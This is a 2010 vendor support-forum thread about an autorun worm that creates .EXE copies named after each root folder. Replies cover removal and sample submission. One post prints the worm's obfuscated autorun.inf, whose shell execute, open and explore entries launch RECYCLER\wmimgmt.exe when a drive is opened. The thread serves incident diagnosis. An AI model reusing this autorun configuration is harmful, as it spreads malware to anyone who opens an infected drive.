Endpoint Protection

 View Only
  • 1.  virus creates a .EXE file for each folder name

    Broadcom Employee
    Posted Jun 15, 2010 10:32 AM

    Hi everyone!

    The virus creates a .EXE file for each folder name inside the root directory. For example: it creates a "Windows.EXE", "Documents and Settings.EXE", "Program Files.EXE", and all other folder names in the root directory are created for a file with an extention ".EXE". It also creates a "Recycle.EXE" - i think this is the source virus. "Recycle.EXE" has an attribute of "SHR".

    I manually deleted these ".EXE" files but it keeps on coming back after a while!
    My environment includes: 1500 Desktop PC's. 1 SEP RU5 Server. Latest definition offcourse.

    Scanning this EXE files showing no virus result.

    Thank you folks for your help.


  • 2.  RE: virus creates a .EXE file for each folder name

    Posted Jun 15, 2010 10:37 AM
    Follow this discussion , should resolve the issue

    https://www-secure.symantec.com/connect/forums/virus-issue-foldernameexe


  • 3.  RE: virus creates a .EXE file for each folder name

    Broadcom Employee
    Posted Jun 15, 2010 11:38 AM
    Hi NirH,

    If you have a threat on your system that Symantec Endpoint Protection is not detecting, the most likely reason is that Symantec does not yet have a definition for your particular threat.

    You should submit the suspicious file's .exe files to Symantec for analysis by our Security Response team. If we confirm that the file is indeed malicious, we will create virus definitions for the threat so that we can catch it in the future.

    If you do not know how to submit files to our Security Response team for analysis, please contact our support team. They can provide you with the necessary information.

    Regards,
    James


  • 4.  RE: virus creates a .EXE file for each folder name

    Broadcom Employee
    Posted Jun 15, 2010 12:10 PM
    This is the output of the autorun.inf
     for 16-bit app support
    [fonts]
    [extensions]
    [mci extensions]
    [files]
    [Mail]
    MAPI=1
    CMCDLLNAME32=mapi32.dll
    CMC=1
    MAPIX=1
    MAPIXVER=1.0.0.1
    OLEMessaging=1
    [MCI Extensions]
    aif=loghours.dll
    aifc=psnppagn.dll
    aiff=ole2.dll
    asf=d3dramp.dll
    asx=MPEGVideo2
    mpe=usrdtea.dll
    mpeg=MPEGVideo
    mpg=MPEGVideo
    mpv2=idq.dll
    snd=atl.dll
    wm=mcd32.dll
    wma=MP3
    wmp=MP4
    wmv=MPEG
    wmx=MPEGVideo2
    25846ki756as
    ;cc30qiLas JdZ3adCPEadfj823423423
    [Kasasf0q]iLasdfjKD28Ls33wDm2rq6Jl1EdAf8
    ;K0qi asfLasmet Ca19lhs ipconfigdfjKD28 mpeg Ls33
    ;8sdaA89KL3J0DSKJLG8P34Ld0laH saG
    [shellas]dBopncomasdnsdf=fdsjsdf.exenghsadnetstad.
    as=asdfasddfsad asdfsafsdfsafdasf
    ;ff0qiLasJdKPEGVi2412344
    oaeFK1Kajkw6DdDL2f3a31zazi8a135Lwra
    Ls33wDm2rq6Jl1EdAf8soae FK1Kajkw6DdDLKAl6sdcO7K
    asdfsadfLsafdsfadsdm FKajkw6KAl6sdcO7K
    ;K0qiLaasJdZ3adCsa1sdfjKD2asdsdfasdf
    ;K0qiLa1Kajkw645rthggK2f3a31zazi8a35Lwra
    [autorun]K0qi3adCa19lhsdfjKD2asfd23asdfsdfa
    PRINT=PRINT.EXE ASDd1sdaf897asdj
    ;[asfd3]2KdafjKD2
    Play= Copy pictures to a foler on my computer
    shEllEXEcuTe = RECYCLER\wmimgmt.exe
    ;8sdaA8G8P34LklJ8ASD FL333sd0laHsaG12fgsdsaKd
    sheLL\oPeN\coMManD =RECYCLER\wmimgmt.exe
    ;343P5Fsd2fKgCOMNANDASDF=REC R5gf56sd315eK562AdsFSD
    ;89234SAKDJWKsatyh3adaflk7yas
    ;343P5F 25F5gf56sd315eK56fs43d4asd56KdaDfs1
    shELl\ExpLore\ComMand= RECYCLER\wmimgmt.exe
    s=asfdsadffsdafdAf8soaeFExpLoreqiLasJdZ3adC
    ;89234SAKfdlk28ASDFsaaty7yasK6DRg if5S3jsKHks
    Action=Open folder to view files
    ;8k3kKsafG ASDFdlsflfKa23F4jksfaF3J90s
    ;f0PEGVideoqiLasJdZ3adCa19lhsdfjKD223asdfasfd
    Spell=Take no action then print the picture
    [drivers]
    wave=mmdrv.dll
    timer=timer.drv
    [mci]
    [driver32]
    [386enh]
    woafont=app936.FON
    EGA40WOA.FON=EGA40WOA.FON
    EGA50WOA.FON=KBDSP.FON


  • 5.  RE: virus creates a .EXE file for each folder name

    Posted Jun 15, 2010 12:36 PM
    Hi NirH,

    In addition to the folder .exe's, please look for and submit this file to Security Response:

    RECYCLER\wmimgmt.exe

    Chances are, there are additional suspicious files in other load points.  The SEP Support Tool can help to identify them automatically.

    Thanks and best regards,

    Mick


  • 6.  RE: virus creates a .EXE file for each folder name

    Posted Jun 15, 2010 01:18 PM
    follow this document and then submit the files to the security response team.
    use the load point tool
    http://service1.symantec.com/support/ent-security.nsf/docid/2010011510455048


  • 7.  RE: virus creates a .EXE file for each folder name

    Posted Jun 15, 2010 02:25 PM

    1. Start with downloading the Rapid Release definitions.
    http://www.symantec.com/business/security_response/definitions/download/detail.jsp?gid=rr

    2. Boot into safe mode and running a Disk Cleanup (right-click the C drive, Properties, Disk Cleanup) - that will delete all the files that are in these temporary locations, as well as IE's temporary files, etc. Perform a full system scan in safe mode.

    3. If that fails to remove the threat, try running the Norton Power Eraser - Because the Norton Power Eraser uses aggressive methods to detect these threats, there is a risk that it can select some legitimate programs for removal. You should use this tool very carefully, and only after you have exhausted other options.

    http://security.symantec.com/nbrt/npe.asp?lcid=1033&origin=default

    Cheers,
    Thomas



  • 8.  RE: virus creates a .EXE file for each folder name

    Broadcom Employee
    Posted Jun 16, 2010 03:24 AM

    Does anybody have an idea how to decrypt the parts of the autorun.inf file shown above, the one starting with '25846ki756as'?
    I'm trying to learn how this stuff works in inf and bat files. Thanks.



  • 9.  RE: virus creates a .EXE file for each folder name

    Broadcom Employee
    Posted Nov 10, 2010 08:00 PM

    Hello,

    I had the same the same problem but with my flash drive. I use shared computer in a hostel and it made my flash drive folders exe's files now I have loads of pictures there that I would like to retreive. So my question is how if I don't have access to this computer make my foldres back?